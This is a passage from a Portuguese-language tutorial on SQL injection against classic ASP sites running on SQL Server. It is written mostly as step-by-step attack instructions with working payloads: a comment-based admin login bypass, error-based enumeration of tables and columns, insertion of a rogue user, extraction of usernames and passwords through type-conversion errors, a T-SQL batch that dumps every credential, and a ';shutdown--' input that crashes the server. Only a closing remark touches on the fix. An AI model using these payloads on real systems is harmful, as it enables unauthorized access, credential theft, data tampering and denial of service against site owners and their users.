‘ Isso pega o usuário e senha informados no formulário
cUser = trim(request(usuario))
cSenha = trim(request(senha))

‘Isso verifica no banco de dados se o usuário e senha conferem
‘ (vamos supor que o banco já esteja aberto com o nome de objConn)
SQLOpen = select usuario, senha, nome, admin from Users where usuario=’ & cUser & ‘ and senha=’ & cSenha & ‘
objRS.Open SQLOpen, objConn

‘ Verifica se achou um usuário com o login e senha informados
if not objRS.bof then
if objRS.fields(usuario) = cUsuario and objRS.fields(senha) = cSenha then
response.write Bem vindo & objRS.fields(nome) & !
else
response.write Login inválido.
end if
else
response.write Login inválido.
end if

*****

Dessa forma não há furos de aspa simples ou aspa dupla, pois o IF não se confunde com isso.

Outra forma também, seria tratar o caractere da aspa simples dentro dos campos de usuario e senha, não deixando ele estar contido nesses campos. Mas é um pouco mais trabalhoso.

Outra coisa que é bom lembrar, é que esse erro não afeta somente a internet. Sistemas feitos em Delphi e Visual Basic com esse tipo de verificação de usuário também estão passíveis a esse erro. Portanto, verifique-os também.

Modo Avançado, buscando e alterando dados

Agora que você já sabe como entrar em um site restrito, que peça login e senha, feito em asp com sql, vamos aprender agora como ver dados das tabelas, modificar ou até mesmo apagar todo o banco de dados.

Aqui são usados conhecimentos avançados de programação em SQL e, se você não conhece SQL (a linguagem), então essa matéria não vai adiantar muita coisa pra você. Recomendo que caso queira se tornar um perito em invasão de banco de dados, vá aprender SQL primeiro.

Nem só de campos de formulários vive um site. O site também pode passar informações pela linha de endereços. Se você não consegue fazer alguma coisa pelos próprios campos (aqui também usaremos o campo de usuário de um login para fazer as ações), então abra o código fonte da página (aquele com o clique do botão direito do mouse, exibir código fonte), e procure pela linha do Form Action. O que vem depois do Action é a url ou página a ser chamada pelo formulário. Depois, procure nas tags de inputs o campo de entrada do usuário, geralmente denominado name=usuario ou name=user. Feito isso, já temos a nossa ação pela linha de comando, livre das travas impostas pelo formulário, tais como o limite de caracteres ou alguma validação de campo feito em javascript. Dessa forma, invés de preencher o campo usuário no form, você colocaria no endereço uma url desse tipo:
www.siteemasp.tld/arquivo.asp?user=comandos em sql

Não se preocupe com os espaços na URL, pois o Internet Explorer é bonzinho e se encarrega de trocar pelos devidos códigos de espaço (%20)

Vamos falar um pouco de teoria

No SQL, o comando de banco de dados é simplesmente uma string com um texto dentro. Esse texto, formado de comandos pré-estipulados, é interpretado pelo SQL e retorna o que foi pedido. Além dos comandos, existe também uma definição de Comentário dentro do SQl, que pra muita gente é algo desconhecido. Da mesma forma que você pode comentar o seu script ou programa, incluindo linhas que dizem pra que serve cada bloco, o SQL também permite, dentro dessa string, um comentário que facilitará o entendimento daquela string quando for lida por outra pessoa. Apesar de quase nunca ser usada na prática, esse caractere de comentário terá uma função extremamente valiosa para nós. Outro caractere que será muito usado e venerado aqui, é o caractere de “faz mais alguma coisa”, que além de executar o primeiro comando, manda executar um segundo comando dentro daquele primeiro. Entenderão o que eu estou dizendo mais na frente.

Só pra ilustrar, o caractere de comentário são dois sinais de menos “–“ e o caractere de nova execução é o ponto-e-vírgula “;”. O caractere asterisco “*” significa todos os campos da tabela.

Finalmente, vamos a prática…

Seria interessante que ao mesmo tempo em que você for lendo, ir também testando em algum site o que será dito adiante. É mais prudente montar um site em asp, com um acesso ao banco de dados em SQL Server próprio, para testar. É sempre válido lembrar que esta matéria é apenas para fins educacionais. J

Você está num site em asp, com acesso por SQL, que usa um campo de login e senha vistos por uma sql desse tipo:

SQL = “Select * from usuarios where username=’” & user & “’ and pass=’” & pass & “’”

A sql é desse tipo, mas você como usuário normal do site não conseguiria saber disso.

No campo de usuário, se você colocar o conteúdo:
Usuário: admin’ –
Senha: xyz

O que irá acontecer é que você irá entrar no site como se fosse o admin (levando em consideração que admin é o usuário real cadastrado no banco de dados como sendo o admin), mesmo sem saber a senha do admin, pois a senha agora será ignorada.

O caractere – - no final do campo especifica pro sql que daquele ponto em diante tudo é comentário, e a string do SQL final ficaria desse tipo:

SQL = “Select * from usuarios where username=’admin’ — ‘ and senha=’xyz’ “

Ou seja, a verificação “ ‘ and senha=…” virou um simples comentário dentro daquela string e não será processada pelo interpretador do sql. Dessa forma, você entrar simplesmente designando o username.

Creio que agora está entendido o uso do caractere de comentário. Vamos seguir em frente.

Caso você não saiba o nome de algum campo da tabela, ou até mesmo não saiba o nome de alguma tabela, podemos usar as mensagens de erro do SQL para poder conhecer mais sobre as tabelas do site. Façamos da seguinte forma no campo de usuário:

Usuário: ’ having 1=1 –
Senha: xyz

O erro dado será parecido com o abaixo:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘usuarios.CODIGO’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/arquivo.asp, line 94
Agora, você já sabe o nome da tabela (usuarios) e o nome do primeiro campo (código) da consulta na tabela. Como foi usado *, este campo é o primeiro a ser retornado.

Se fosse usada uma string do tipo:

SQL = “select nome, login, senha, nivel, cpf from usuarios where ….”

O que ia ser retornado é usuarios.NOME, pois é o primeiro campo da pesquisa.

Se você agora montar uma outra string dentro do campo nome, irá saber o próximo campo da tabela:

Usuário: ’ group by usuarios.codigo having 1=1 –
Senha: xyz

Isso irá produzir o seguinte erro:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘usuarios.login’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/arquivo.asp, line 94
Você agora pode ir gerando erros assim até saber todos os campos que serão retornados da string SQL. Basta para isso dividir os campos com vírgula, assim:

Usuário: ’ group by usuarios.codigo, usuarios.login having 1=1 –

Quando você não obter mais nenhuma mensagem de erro, significa que todos os campos já estão validados e constam na string. Nesse ponto, você já saberá todos os campos e a ordem que eles virão.

Agora é interessante saber o tipo de cada campo e, para isso, vamos obrigar o sql a gerar um novo erro:

Usuário: ’ union select sum(login) from usuarios –

O erro aparece como:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
/arquivo.asp, line 94
Isso informa que o campo login é do tipo varchar. Mas se por acaso a mensagem de erro vier da forma a seguir, é porque o campo em questão é do tipo numérico.
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/arquivo.asp, line 94
Agora que você já sabe o nome da tabela, os nomes dos campos e seus respectivos tipos, vamos ao próximo passo, que é usar o caractere de “faz mais alguma coisa”, o excelentíssimo ponto-e-vírgula.

Usuário: ’ ; insert into usuarios (nome, login, senha, nivel, cpf ) values ( “Geek”, “haxo”, “p4ss”, 1, “12345678900”) –

Preciso explicar!? J Bem, isso faz uma inclusão na tabela usuários de um registro, o qual tem o username sendo haxo e a senha p4ss, o que permitiria a você ser um novo usuário do site, dessa vez devidamente registrado.

Obviamente, isso não se restringe a tabelas de usuários. Serve para qualquer tabela no site, como matérias, enquetes, colunas e até mesmo alguma tabela que guarde dados financeiros como cartões de crédito ou outras coisas.

Uma ténica boa para descobrir o conteúdo dos campos é atribuindo um campo texto a um campo numérico. Por exemplo, vamos supor que o site em um determinado momento, se referencie a uma matéria dentro dele por um código numérico, do tipo idm=432. Daí, podemos descobrir um usuário fazendo o seguinte esquema na URL:

www.siteemasp.tld/pagina.asp?idm=(select min(login) from usuarios) –

O erro retornado será assim:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘anderson’ to a column of data type int.
/arquivo.asp, line 94
Ou seja, sabemos que o menor login (na ordem alfabética) é Anderson. Isso acontece dessa forma direta, pois dentro do SQL a comparação de números não pode ter aspas simples, e o campo pode ser comparado com uma nova string sql, desde que entre parênteses.

Agora, podemos também descobrir sua senha, dessa forma:

www.siteemasp.tld/pagina.asp?idm=(select senha from usuarios where login=’anderson’) –
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘14quatorze’ to a column of data type int.
/arquivo.asp, line 94
Agora sabemos um usuário e uma senha real do site. Claro que se a senha do Anderson fosse numérica, o que aconteceria era aparecer uma matéria qualquer, mas bastaria pegar o ID da matéria, em algum lugar do código fonte, ou até mesmo na barra de endereços (caso ela mudasse), e saberíamos a senha dele, do mesmo jeito.

Uma outra situação, porém bem mais complexa e avançada, é a criação de SQL Transactions, que nada mais é do que um pequeno script que roda dentro do SQL e retorna uma resposta programada.

A seguinte linha, manda que seja criada uma Transact SQL concatenando todos os usuários e senha da tabela, e retornando em uma mensagem.

Usuário: ‘; begin declare @ret varchar(8000) set @ret=’:’ select @ret=@ret+’ ‘+login+’/’+senha from usuarios where login>@ret select @ret as ret into alluser end –

Depois de enviado, isso cria uma tabela chamada alluser com um campo nomeado como ret, que contem um único registro com todos os logins e senhas concatenados.

Para ver o resultado disso, basta executar a url de matérias, dessa vez selecionando esse campo da nova tabela:

www.siteemasp.tld/pagina.asp?idm=(select ret from alluser) –

O retorno será alguma coisa desse tipo:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘: atadmin/umasenha user3/abcd anderson/14quatorze’ to a column of data type int.
/arquivo.asp, line 94

Depois de ver os dados da nova tabela, apague-a:

Usuário: ‘; drop table alluser –

Captaram a mensagem? Isto é quase tudo que se pode fazer com o SQL Server, quando mau programado dentro de uma ASP. Existem pessoas que acham que simplesmente limitando o tamanho de um campo dentro do formulário, já estão se prevenindo de selects e outros comandos mais. Imaginemos um campo de usuário limitado em 12 caracteres:

Usuário: ‘;shutdown–

Exatos 12 caracteres. Isso derrubará todo o SQL Server da máquina, atingindo também outros sites que usarem esse servidor. Se limitar em menos, existe a alternativa de fazer direto no endereço da url, como foi mostrado no caso do ID de uma matéria do site.

Existe ainda formas de, por comandos em SQL, executar comandos arbitrários dentro do server que roda o sql server. Você por exemplo, poderia obter o dir de um c: ou até mesmo criar e apagar arquivos dentro da máquina. Mas isso, é um outro assunto. Por hora, tá bom.

Vale lembrar que todas essas situações descritas aqui funcionam em sites com SQL Server. Sites que tem um MDB como banco de dados, os selects funcionarão, mas coisas como SQL Transact e alguns outros comandos peculiares ao SQL Server não irão funcionar.

Você é programador de um site (ou vários) em asp e está perplexo com tudo isso, pois todos os sites que você fez estão vulneráveis a esse erro, e você precisa de uma solução rápida para consertar todos eles? Infelizmente, não existe. Você vai ter que verificar o conteúdo de cada variável, dentro da própria asp, antes de coloca-la dentro de um comando sql. Difícil e penoso? Pois é… quem mandou escolher essa profissão… )